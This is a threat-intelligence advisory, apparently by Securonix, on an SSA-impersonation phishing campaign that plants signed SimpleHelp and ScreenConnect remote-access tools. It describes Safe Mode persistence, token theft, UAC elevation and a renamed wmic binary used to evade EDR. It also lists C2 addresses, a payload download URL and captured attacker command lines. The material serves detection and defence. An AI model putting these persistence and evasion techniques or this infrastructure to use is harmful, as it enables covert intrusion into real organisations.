VENOMOUS#HELPER: Dual-RMM Phishing Campaign Leveraging JWrapper-Packaged SimpleHelp and ScreenConnect for Silent Remote Access
By Securonix Threat Research: Akshay Gaikwad, Shikha Sangwan, Aaron Beardslee

tldr:
Phishing campaigns leveraging remote management tools is nothing new. Securonix Threat Research has conducted in-depth dynamic analysis of an ongoing phishing campaign targeting multiple vectors, active since at least April 2025. The campaign has impacted over 80 organizations, predominantly in the United States, spanning multiple sectors. This campaign leverages vendor-signed Remote Monitoring and Management (RMM) software to establish silent, persistent access. In this case, a customized SimpleHelp and SecureConnect RMMs are used to bypass defenses as they are legitimately installed by the unsuspecting victim. This campaign appears to have been tracked previously by Sophos (tracked as STAC6405) and Redcanary independently while the indicators and behavior within this advisory support and extend the depth of their respective research.
The campaign is notable for deploying two independent RMM tools simultaneously, a self-hosted SimpleHelp 5.0.1 instance and a ScreenConnect relay, creating a redundant dual-channel access architecture that survives remediation of either channel independently. Infection originates from SSA government impersonation phishing where the victim is directed to verify their email and download a purported SSA statement. After the user opens the ‘SSA statement’, the malware silently installs itself as a Windows service with Safe Mode persistence, automated security posture surveillance running every 67 seconds, and operator presence detection polling every 23 seconds. No attribution has been formally assigned; Securonix assesses this activity is consistent with a financially motivated Initial Access Broker (IAB) or ransomware precursor operation targeting the Western economic bloc.
Key Findings:
| Attribute |
Detail |
| Campaign Name |
STAC6405 (Sophos cluster) |
| Active Since |
April 2025 (ongoing) |
| Primary Targets |
United States, Western Europe, Latin America (9 languages) |
| Initial Vector |
U.S. Social Security Administration (SSA) government impersonation phishing → compromised [.]com.mx frontend → payload download
|
| Phishing Frontend |
gruta[.]com.mx (email harvesting; attacker-controlled or compromised .com.mx domain currently serving live SSA phishing content (Google-indexed))
|
| Payload Host |
server.cubatiendaalimentos[.]com[.]mx/~tiendazoycom/sns/ (legitimate Mexican grocery e-commerce site (PrestaShop); payload hosted under a separate shared hosting account (~tiendazoycom) on the same server)
|
| Primary RMM |
SimpleHelp 5.0.1 (self-hosted, cracked build) via JWrapper |
| Secondary RMM |
ConnectWise ScreenConnect (self-hosted relay, port 8041) |
| Persistence |
Windows SCM service + SafeBoot\Network registry key |
| Attribution |
Unattributed; assessed as financially motivated IAB/ransomware precursor |
| Infrastructure |
84.200.205[.]233:5555 (SimpleHelp C2) | 213.136.71.246:8041 (ScreenConnect relay) |
| Relay Domain |
sslzeromail[.]run.place -> 213.136.71.246 (IONOS DE, AS8560) |
Infection Chain: From Phishing Email to Persistent Access
The STAC6405 infection chain begins with a U.S. Social Security Administration (SSA) government impersonation phishing email and progresses through a multi-stage delivery pipeline before any malicious process executes on the victim host. The following stages were captured during dynamic analysis of the campaign.
Stage 0 — Delivery: SSA-Themed Phishing Email and Two-Stage Compromised Hosting
Victims receive an email impersonating the U.S. Social Security Administration, claiming a new statement is available for review. The email contains a link to a compromised legitimate Mexican business website (gruta[.]com.mx) rather than an attacker-registered domain, a deliberate technique to bypass Secure Email Gateway (SEG) reputation filtering, since established [.]com.mx domains carry legitimate reputation scores that newly registered attacker domains would lack.

The gruta[.]com.mx landing page presents a convincing SSA-branded verification page prompting the user to confirm their email address before ‘accessing their statement.’ This email harvesting step serves a dual purpose: it validates that the victim is real and attentive, and it gives the attacker a deliverable contact for follow-on campaigns.
Upon email submission, the victim is directed to download the payload from a second attacker-controlled host: server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe




This URL reveals a cPanel legacy shared hosting compromise. The tilde (~) prefix and username path (tiendazoycom) indicate the attacker gained access to a single cPanel user account on the legitimate hosting server, not the root server itself. The legitimate business site (cubatiendaalimentos[.]com.mx — a Cuban food retailer) remains unmodified; only the weaponized /~tiendazoycom/sns/ subdirectory is attacker-controlled. The /sns/ directory path is assessed as a deliberate reference to Social Security, maintaining lure consistency.
The downloaded file (statement5648.exe) exploits two Windows default behaviors to appear legitimate:
- File extensions are hidden by default in Windows Explorer, causing ‘statement5648.exe’ to display as ‘statement5648’ masquerading as an authentic numbered government reference document
- JWrapper embeds a custom application icon and splash image in the binary, further reinforcing the document appearance

UAC Prompt Social Engineering
When the victim double-clicks the lure, Windows User Account Control (UAC) displays a prompt before execution. Rather than the red ‘Unknown Publisher’ warning that malware typically triggers, the victim sees:
Verified publisher: SimpleHelp Ltd ← Blue shield icon (trusted, Thawte-signed cert)
Do you want to allow this app to make changes to your device?

The victim is in the cognitive frame of opening a government SSA document. The UAC prompt naming ‘SimpleHelp Ltd’ as a verified publisher sounds plausible in a support context (‘help’ with your Social Security). The valid Thawte Authenticode certificate produces the blue verified shield rather than the red unknown publisher warning. These factors combine to substantially increase approval rates. This is the sole moment where victim interaction is required, every subsequent step of the infection chain runs silently with no further prompts.
Stage 1 — Initial Execution: JWrapper Bootstrap (statement5648.exe)
The phishing lure is a JWrapper-packaged Windows executable named to mimic official government or legal documents (e.g., statement5648.exe, ContractAgreementToSign.exe) — consistent with the SSA government impersonation pretext used in the delivery stage. When executed from the victim’s Downloads directory, the binary’s embedded extractor activates:
- Reads and decrypts a 213KB encrypted configuration overlay appended after the PE sections
- Extracts a bundled private JRE (Oracle Java 1.7.0_79, EOL 2015) to C:\ProgramData\JWrapper-Remote Access\
- Decodes hex-encoded C2 configuration: sg_servers = udp://84.200.205[.]233:5555
- Writes a JWLaunchProperties config file to disk, passes it to the JVM as an argument, then deletes it within milliseconds
- The process runs entirely silently: sg_silent_install=true, show_no_ui=true, sg_install_shortcuts=false
The originating executable path (C:\Users\<victim>\Downloads\<lure>.exe) is permanently baked into every subsequent binary the installer generates, serving as a forensic origin marker.

Stage 2 — Service Installation: SimpleService.exe
SimpleService.exe reads the simplegateway.service config file and registers a persistent Windows service named ‘Remote Access Service’ via the Windows Service Control Manager (SCM). Beyond standard service registration, it performs two critical persistence operations:
- Safe Mode Persistence: Writes to HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Remote Access Service, ensuring the RAT survives Safe Mode with Networking reboots — the most common defender response to persistent malware
- Liveness Watchdog: Monitors the file C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\sgalive. If the RAT process fails to update this file, SimpleService.exe automatically restarts it, providing self-healing persistence
The service binary path set in the registry points back to SimpleService.exe with the service config file as its argument, ensuring the chain survives reboots.
Stage 3 — JVM Launch: SimpleGatewayService.exe
SimpleGatewayService.exe is a self-contained JWrapper launcher with the complete attacker C2 configuration baked into its 213KB encrypted binary overlay. It bootstraps the Java runtime and launches customer.jar — the core SimpleHelp RAT — with the following hardened JVM flags:
- -Xrs: Suppresses OS signal handling, making the process resistant to SIGTERM and standard kill commands
- -Djava.net.preferIPv4Stack=true: Forces IPv4 to avoid IPv6 routing issues on victim hosts
- -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2: Explicitly downgrades TLS to support the EOL Java 1.7 runtime communicating with modern C2 infrastructure
- -Xmx256m: Caps heap at 256MB to maintain a minimal memory footprint
Stage 4 — Session Escalation: session_win.exe + elev_win.exe
The RAT cannot interact with the user desktop from Session 0 (SYSTEM) without crossing session boundaries. It accomplishes this through a two-binary escalation chain:
- session_win.exe acquires SeDebugPrivilege via AdjustTokenPrivileges, then enumerates running processes using CreateToolhelp32Snapshot to locate winlogon.exe in the target interactive session. It calls OpenProcessToken and DuplicateTokenEx to clone the Winlogon token, then uses CreateProcessAsUserW with CreateEnvironmentBlock to launch child processes in the victim’s desktop context
- elev_win.exe handles UAC elevation via ShellExecuteEx with the ‘runas’ verb (Vista+) or CreateProcessWithLogonW with stored credentials (XP-era fallback). It also provides the –mouselocation switch for cursor position polling and –amiadministrator for privilege checking
This chain enables the attacker to achieve fully interactive desktop access — reading the screen, injecting keystrokes, and accessing user-context resources — all from a SYSTEM service.
Stage 5 — C2 Beacon and Dual-Channel Establishment
With the service running, the SimpleHelp gateway component connects outbound to the attacker’s self-hosted server:
- Primary C2 channel: udp://84.200.205[.]233:5555 (SimpleHelp SimpleGateway protocol) — provides scripted command execution, automated monitoring, and file transfer
- Secondary C2 channel: relay://sslzeromail[.]run.place:8041 (ScreenConnect relay) — provides interactive desktop access via ConnectWise ScreenConnect installed separately
The victim machine registers on the attacker’s console under its hostname (e.g., WKS-DEV01) with its campaign profile ID (sh_app_profile: 43794105415826700294423976831165084124). The attacker’s console immediately begins receiving automated telemetry from the continuous monitoring loop described in Section 3.
Both channels operate independently. If the ScreenConnect relay domain is taken down, the SimpleHelp channel survives, and vice versa. The attacker designed this redundancy deliberately to ensure access persists through partial remediation.

Why RMM Software Instead of Custom Malware
The central evasion insight of STAC6405 is that RMM software is inherently trusted. All SimpleHelp binaries carry valid Authenticode signatures from SimpleHelp Ltd issued by Thawte, a globally trusted CA. The ScreenConnect client is similarly signed by ConnectWise. This means:
- Antivirus products will not flag the files — they pass signature-based checks at every stage
- Windows SmartScreen and Mark-of-the-Web protections are bypassed by the valid code signatures
- EDR behavioral rules must rely entirely on process lineage and parent-child relationships rather than file hashes
- Network security controls see outbound connections to known commercial software endpoints, not to known-malicious C2 infrastructure
The specific SimpleHelp build deployed (version 5.0.1, compiled 2017-07-07) is consistent with a cracked or leaked package circulated in criminal forums since the 2016–2019 era. The expired certificate validity window (2015–2018) and the absence of any license authentication behavior confirms this is not a legitimately licensed deployment. This cracked distribution model means the attacker incurred zero acquisition cost and left no payment trail with the software vendor.

The Dual-RMM Architecture
The two RMM tools serve distinct operational roles that complement each other:
| Attribute |
SimpleHelp (JWrapper) |
ScreenConnect |
| Primary Role |
Automated surveillance + scripted command execution |
Interactive desktop access (hands-on-keyboard)
|
| Protocol |
UDP + HTTP (port 5555) |
Proprietary relay (TCP port 8041) |
| C2 Host |
84.200.205[.]233 (undisclosed hosting) |
213.136.71.246 (IONOS DE, AS8560) |
| C2 Domain |
None (IP-direct) |
sslzeromail[.]run.place |
| Persistence |
Windows service + SafeBoot registry key + liveness watchdog |
Enrolled in attacker ScreenConnect tenant
|
| Detection Difficulty |
High (signed, legitimate vendor binary set) |
High (signed ConnectWise client) |
| Redundancy Role |
Survives ScreenConnect domain takedown |
Survives SimpleHelp IP block |
SimpleHelp Capability Profile
The deployed SimpleHelp version (5.0.1) provides a comprehensive remote administration capability set. Analysis of customer.jar via static decompilation and runtime observation confirmed the following capabilities are present and enabled:
- Full Remote Desktop (VNC-based): Complete interactive desktop control with screen capture, keyboard and mouse injection via SendInput/SetCursorPos APIs, and clipboard access
- Shell / Command Execution: Scripted command execution via winpty-agent64.exe, a Windows pseudo-terminal bridge that provides a fully functional interactive shell session over named pipes. Supports cmd.exe, PowerShell, and any console application
- Silent Session Access: RequireSessionConfirmation=false in serviceconfig.xml means the attacker connects with no victim notification, no taskbar popup, and no UI indicator of any kind
- Cross-Session Process Injection: exe enables execution in the victim’s interactive desktop session from the SYSTEM service context by stealing a process token from winlogon.exe using SeDebugPrivilege and DuplicateTokenEx
- UAC Elevation: exe provides silent privilege elevation via ShellExecuteEx ‘runas’ verb (Vista+) or CreateProcessWithLogonW with credentials (XP-era), enabling execution as Administrator without user confirmation
- File Transfer (Bidirectional): Full upload and download capability via the FSSync and FSMirror modules embedded in customer.jar
- Windows Firewall Bypass: FirewallAdder utility silently calls netsh.exe to add firewall exceptions for the Remote Access Service without user notification
- Scripting and Automation: AllowScripting=true in serviceconfig.xml enables the attacker to push and execute PowerShell, cmd, and other scripts without requiring an interactive desktop session
- Self-Healing: AllowRecovery=true enables the attacker’s server to force service restarts and re-registration on the victim host remotely if the connection drops
- Cross-Platform Support: jar contains embedded macOS and Linux binaries (uidsetter32/64, LinuxServiceManager), indicating the same package is used across operating systems
Automated Surveillance Loop
Dynamic analysis of the deployed RAT over a one-hour observation window captured 986 Sysmon Event ID 1 (process creation) events generated entirely by the RAT’s background monitoring infrastructure with no operator interaction. Three independent polling loops run concurrently:
| Loop |
Interval |
Count / Hour |
Command |
| WiFi Interface Monitor |
~15 seconds |
233x |
netsh wlan show interfaces
|
| User Presence Detection |
~23 seconds |
157x |
elev_win.exe –mouselocation
|
| Security Suite Enumeration |
~67 seconds |
54x each (4 queries) |
wmic SecurityCenter2 + netsh advfirewall
|
The equal execution counts across all four security enumeration queries (54x each) confirm these fire as a synchronized batch rather than independent triggers, a defining signature of automation rather than hands-on-keyboard activity.
Notable EDR Evasion: wmic.exe.bak
A particularly significant evasion technique was observed within the security enumeration loop. The RAT executes each SecurityCenter2 query via two separate paths simultaneously:
- Direct: Remote Access.exe → wmic.exe /namespace:\\root\SecurityCenter2 PATH AntiVirusProduct get
- Evasion: Remote Access.exe → cmd.exe → wmic.exe.bak /namespace:\\root\SecurityCenter2 PATH AntiVirusProduct get
wmic.exe.bak is a renamed copy of the legitimate wmic.exe binary placed at C:\Windows\System32\wbem\wmic.exe.bak. This technique bypasses name-based EDR detection rules that key on ‘wmic.exe’ while preserving identical functionality. The file C:\Windows\System32\wbem\wmic.exe.bak should be treated as a high-confidence static IOC indicating STAC6405 presence on a host.
Conclusion
At this stage of the attack, the threat actor has achieved a deeply entrenched position on the victim host with minimal forensic visibility. A persistent Windows service surviving Safe Mode reboots, two independent remote access channels operating over signed vendor binaries, a self-healing watchdog that restarts the RAT if it is killed, and a continuous automated surveillance loop reporting the victim’s security posture back to the attacker every 67 seconds, all without a single piece of traditional malware touching disk. The victim organization is left in a state where the attacker can return at any time, execute commands silently in the user’s desktop session, transfer files bidirectionally, and pivot to adjacent systems, while standard antivirus and signature-based controls see nothing but legitimately signed software from a reputable UK vendor. Remediation requires not only removing the service and registry keys but hunting for the renamed wmic.exe.bak binary, auditing the SafeBoot registry hive, and verifying that no second-stage payloads were delivered during any period of operator activity.This campaign is a direct illustration of why behavioral analytics and host telemetry capable of identifying anomalous process lineage, automated polling patterns, and service installation from non-standard paths are essential, because when the malware is the IT management software, the only thing that catches it is the behavior it leaves behind.
Securonix Recommendations
Behavioral analysis indicates the threat actor does not immediately engage hands-on-keyboard following infection. Instead, the RAT operates in a passive surveillance posture — continuously updating the attacker’s console with network state, security product inventory, and user presence data. Based on the mouse position polling cadence (every 23 seconds), Securonix assesses the operator monitors the victim’s idle state and activates only when cursor position has remained static for an extended period, consistent with the victim being away from their workstation. This ‘wait-for-idle’ pattern is a deliberate operational security technique to minimize the risk of the victim observing unauthorized desktop activity.
When an operator does engage, the automated monitoring baseline continues running underneath hands-on-keyboard activity. Defenders should watch for non-repeating, aperiodic process creation events from Remote Access.exe layered on top of the regular automated loop — particularly initial situational awareness commands (whoami, ipconfig, net user, systeminfo) issued in rapid succession, which constitute the operator’s orientation burst upon first interactive connection.
Securonix highly recommends high fidelity endpoint monitoring, such as Sysmon, to capture process creation, network connections tied to processes, dns resolution from the endpoint, and file creation events to provide a full picture of what is happening on the system. Commands found in this advisory were captured with Sysmon Event ID 1 Process Creation.
MITRE ATT&CK Matrix
| Technique ID |
Technique Name |
Observed Behavior |
| T1566.001 |
Phishing: Spearphishing Attachment |
U.S. SSA government impersonation email with link to compromised [.]com.mx frontend
|
| T1584.001 |
Compromise Infrastructure: Domains |
Two legitimate [.]com.mx business sites used for staging and delivery
|
| T1219 |
Remote Access Software |
SimpleHelp + ScreenConnect deployed as dual-RMM
|
| T1543.003 |
Create or Modify System Process: Windows Service |
Remote Access Service installed via SCM
|
| T1562.009 |
Impair Defenses: Safe Mode Boot |
SafeBoot\Network registry key for Safe Mode persistence
|
| T1134.001 |
Access Token Manipulation: Token Impersonation |
winlogon.exe token theft via session_win.exe
|
| T1134.002 |
Access Token Manipulation: Create Process with Token |
CreateProcessAsUserW with stolen token |
| T1548.002 |
Abuse Elevation Control Mechanism: Bypass UAC |
elev_win.exe –runas via ShellExecuteEx |
| T1518.001 |
Software Discovery: Security Software Discovery |
SecurityCenter2 WMI queries every 67 seconds
|
| T1016 |
System Network Configuration Discovery |
netsh wlan show interfaces every 15 seconds
|
| T1036.003 |
Masquerading: Rename System Utilities |
wmic.exe renamed to wmic.exe.bak |
| T1497.001 |
Virtualization/Sandbox Evasion: System Checks |
Mouse position polling for user presence detection
|
| T1027 |
Obfuscated Files or Information |
Hex-encoded C2 config in JWrapper launch properties
|
Relevant Securonix detections
- EDR-ALL-1215-ERR
- WEL-ALL-1186-ERR
- EDR-ALL-32-ERR
- WEL-ALL-1101-ERR
- EDR-ALL-159-RU
- WEL-ALL-1120-RU
- EDR-ALL-987-ERR
- EDR-ALL-1385-ERR
- EDR-ALL-846-ER
- EDR-ALL-73-ER
- EDR-ALL-54-ER
- EDR-ALL-1295-ERR
- EDR-ALL-1032-RU
- EDR-ALL-1274-RU
- EDR-SYM88-ERI
- WEL-ALL-1144-ERR
- EDR-SYM19-ERI
Relevant hunting queries
(remove square brackets “[ ]” for IP addresses or URLs)
- index=activity AND rg_functionality=”Next Generation Firewall” AND destinationhostname NOT NULL AND (destinationhostname CONTAINS “gruta[.]com.mx” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe” OR destinationhostname CONTAINS “sslzeromail[.]run.place”)
- index=activity AND rg_functionality=”Firewall” AND destinationhostname NOT NULL AND (destinationhostname CONTAINS “gruta[.]com.mx” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe” OR destinationhostname CONTAINS “sslzeromail[.]run.place”)
- index=activity AND rg_functionality=”Web Proxy” AND destinationhostname NOT NULL AND (destinationhostname CONTAINS “gruta[.]com.mx” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe” OR destinationhostname CONTAINS “sslzeromail[.]run.place”)
- index=activity AND rg_functionality=”Web Application Firewall” AND destinationhostname NOT NULL AND (destinationhostname CONTAINS “gruta[.]com.mx” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe” OR destinationhostname CONTAINS “sslzeromail[.]run.place”)
- index=activity AND rg_functionality=”DNS / DHCP” AND destinationhostname NOT NULL AND (destinationhostname CONTAINS “gruta[.]com.mx” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe” OR destinationhostname CONTAINS “sslzeromail[.]run.place”)
- index=activity AND rg_functionality=”IDS / IPS / UTM / Threat Detection” AND destinationhostname NOT NULL AND (destinationhostname CONTAINS “gruta[.]com.mx” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/” OR destinationhostname CONTAINS “server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe” OR destinationhostname CONTAINS “sslzeromail[.]run.place”)
- index=activity AND rg_functionality=”Next Generation Firewall” AND ipaddress NOT NULL AND ipaddress IN (“213.136.71.246”, “84.200.205[.]233”)
- index=activity AND rg_functionality=”Firewall” AND ipaddress NOT NULL AND ipaddress IN (“213.136.71.246”, “84.200.205.233”)
- index=activity AND rg_functionality=”Web Proxy” AND ipaddress NOT NULL AND ipaddress IN (“213.136.71.246”, “84.200.205.233”)
- index=activity AND rg_functionality=”Web Application Firewall” AND ipaddress NOT NULL AND ipaddress IN (“213.136.71.246”, “84.200.205[.]233”)
- index=activity AND rg_functionality=”DNS / DHCP” AND ipaddress NOT NULL AND ipaddress IN (“213.136.71.246”, “84.200.205.233”)
- index=activity AND rg_functionality=”IDS / IPS / UTM / Threat Detection” AND ipaddress NOT NULL AND ipaddress IN (“213.136.71.246”, “84.200.205.233”)
Network IOCs
| Type |
Indicator |
Description |
| Domain |
gruta[.]com.mx |
Compromised legitimate MX domain (est. 2002, Index Datacom S.A. de C.V.) — live SSA phishing frontend
|
| URL |
server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/ |
Likely attacker-established infrastructure (domain est. Feb 2024) — payload delivery
|
| URL |
server.cubatiendaalimentos[.]com.mx/~tiendazoycom/sns/statement5648.exe |
Direct payload download URL |
| IPv4 |
84.200.205.233 |
SimpleHelp C2 (UDP+HTTP :5555) |
| IPv4 |
213.136.71.246 |
ScreenConnect relay host (IONOS DE, AS8560)
|
| Domain |
sslzeromail[.]run.place |
ScreenConnect relay FQDN |
| URL |
http[:]//84.200.205[.]233:5555/access/ |
SimpleHelp updater/download endpoint |
| C2 Protocol |
udp://84.200.205[.]233:5555 |
SimpleHelp SimpleGateway C2 |
| C2 Protocol |
relay://sslzeromail[.]run.place:8041/ |
ScreenConnect relay URI |
Campaign Identifiers
| Type |
Indicator |
Description |
| Campaign ID |
43794105415826700294423976831165084124 |
sh_app_profile — attacker SimpleHelp tenant ID (stable cross-victim) |
| Payload Hash |
bce1222fc9e64aba4dd6f963dfd3377afa1844a1df9d5026e06990c8dc5246453b15e61c4f2e0349702a1940c71716e3d327e5224ac6d6e6a7b6c233c15f10f3 |
shpkhash — payload package integrity token |
| JWrapper GU |
52861018 |
JWrapper updater version baked into all installers |
| SCM Service |
Remote Access Service |
Windows service display name |
| Install Path |
C:\ProgramData\JWrapper-Remote Access\ |
Root installation directory |
| Liveness File |
C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\sgalive |
Watchdog heartbeat file |
| Static File IOC |
C:\Windows\System32\wbem\wmic.exe.bak |
Renamed wmic.exe — high-confidence host IOC |
| SafeBoot Key |
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Remote Access Service |
Safe Mode persistence registry key |
Analyzed files/hashes
| File Name |
SHA256 |
| customer.jar (SimpleHelp RAT core) |
810a99a7d6696a36491530e286476b4cf8a819a47fb5e3801fdfecfdb2dc6193
|
| SimpleGatewayService.exe |
641230a9f3091bdd38d04c6df96062bfc82dfc4ff6f663ceb522d3881d6af53a
|
| SimpleService.exe |
dbdddea03c3fc4c2574ce4221450ec86221ebc615c4915c4c4eb3f2a5e3f5b25
|
| session_win.exe |
9369d7194ab03362e9e7af022a48bc6d4e7d91a6ab7c4b5cf5d90abbcd8c7012
|
| elev_win.exe |
97f801e750cfc2d4558020fb246782e034fd6101d75a59d8915b4f2b2b50ebd9
|
| winpty-agent64.exe |
11914d10b51b5a96606ae606b5ab70d79550e36c1cce94a86134107c59075e0c
|
| jwrapper_utils.jar |
76d85124db2778baecee24cc5ad56c9a3060c41c5b3c1b5cdc7f0435e0f77cac
|
| serviceconfig.xml |
d953dfbe8d91dc9fafad0a6117e1276fa636d4ae1b6a4d81616ff2446cf09234
|
| simplegateway.service |
3e4b3559fdbe584e19a1ff9b3142b429c6fb91aaa63b5c922c8c5b32c38e426a
|
Commands Captured During Dynamic Analysis
| Process Name |
Parent Process Name |
Command Line |
| cacls.exe |
Remote Access.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWApps\JRE-LastSuccessfulOptions-JWrapper-Windows64JRE-00052234686-complete” /e /g “Users”:F |
| cacls.exe |
Remote Access Monitoring.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\ProxyCredentials” /e /g “Users”:F |
| cacls.exe |
Remote Access Monitoring.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\jwLastRun” /e /g “Users”:F |
| cacls.exe |
Remote Access Monitoring.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\DetectedProxies” /e /g “Users”:F |
| cacls.exe |
Remote Access Monitoring.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwLastRun” /e /g “Users”:F |
| cacls.exe |
Remote Access Monitoring.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwLastRun” /e /g “Users”:F |
| cacls.exe |
Remote Access.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\StopSimpleGatewayService.exe” /t /e /g “Users”:F |
| cacls.exe |
Remote Access.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleService.exe” /e /p “Users”:R |
| cacls.exe |
statement5648.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWApps” /e /g “Users”:F |
| cacls.exe |
Remote Access.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwLastRun” /e /g “Users”:F |
| cacls.exe |
statement5648.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete” /e /g “Users”:F |
| cacls.exe |
Remote Access.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\DetectedProxies” /e /g “Users”:F |
| cacls.exe |
statement5648.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\ProxyCredentials” /e /g “Users”:F |
| cacls.exe |
Remote AccessLauncher.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWApps\JRE-LastSuccessfulOptions-JWrapper-Windows64JRE-00052234686-complete” /e /g “Users”:F |
| cacls.exe |
statement5648.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\LastProxy” /e /g “Users”:F |
| cacls.exe |
Remote Access.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\ProxyCredentials” /e /g “Users”:F |
| cacls.exe |
Remote Access.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\serviceid.lock” /t /e /g “Users”:f |
| cacls.exe |
Remote Access.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\StopSimpleGatewayService.exe” /t /e /p “Users”:R |
| cacls.exe |
statement5648.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwLastRun” /e /g “Users”:F |
| cacls.exe |
statement5648.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWApps\Remote_Access_ConfigureICO.ico” /e /g “Users”:F |
| cacls.exe |
statement5648.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete” /e /g “Users”:F |
| cacls.exe |
statement5648.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396476830-7” /t /e /p “Users”:R |
| cacls.exe |
statement5648.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWApps\JWrapper-Remote Access-UninstallerICO.ico” /e /g “Users”:F |
| cacls.exe |
Remote Access.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\SimpleGatewayService.exe” /t /e /p “Users”:R |
| cacls.exe |
Remote Access.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\jwLastRun” /e /g “Users”:F |
| cacls.exe |
statement5648.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig” /e /g “Users”:F |
| cacls.exe |
statement5648.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWApps\ChosenLanguage” /e /g “Users”:F |
| cacls.exe |
statement5648.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396476830-7” /e /g “Users”:F |
| cacls.exe |
statement5648.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\jwLastRun” /e /g “Users”:F |
| cacls.exe |
Remote Access.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwLastRun” /e /g “Users”:F |
| cacls.exe |
statement5648.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwLastRun” /e /g “Users”:F |
| cacls.exe |
statement5648.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\logs” /e /g “Users”:F |
| cacls.exe |
statement5648.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\DetectedProxies” /e /g “Users”:F |
| cacls.exe |
Remote Access.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\SimpleGatewayService.exe” /t /e /g “Users”:F |
| cacls.exe |
Remote Access.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\serviceconfig.xml” /e /p “Users”:R |
| cacls.exe |
statement5648.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete” /e /g “Users”:F |
| cacls.exe |
Remote Access.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWApps\JRE-LastSuccessfulOptions-JWrapper-Windows64JRE-00052234686-complete” /e /g “Users”:F |
| cacls.exe |
statement5648.exe |
cacls “C:\ProgramData\JWrapper-Remote Access” /e /g “Users”:F |
| cacls.exe |
Remote Access.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService” /t /e /g “Users”:F |
| cacls.exe |
statement5648.exe |
cacls “C:\ProgramData\JWrapper-Remote Access\Remote AccessWinLauncher.exe” /e /g “Users”:F |
| cmd.exe |
wmic.exe |
C:\Windows\system32\cmd.exe /c C:\Windows\System32\wbem\wmic.exe.bak /namespace:\\root\SecurityCenter2 PATH FirewallProduct get |
| cmd.exe |
Remote Access.exe |
cmd.exe /c netsh advfirewall show all State |
| cmd.exe |
wmic.exe |
C:\Windows\system32\cmd.exe /c C:\Windows\System32\wbem\wmic.exe.bak /namespace:\\root\SecurityCenter2 PATH AntiSpywareProduct get |
| cmd.exe |
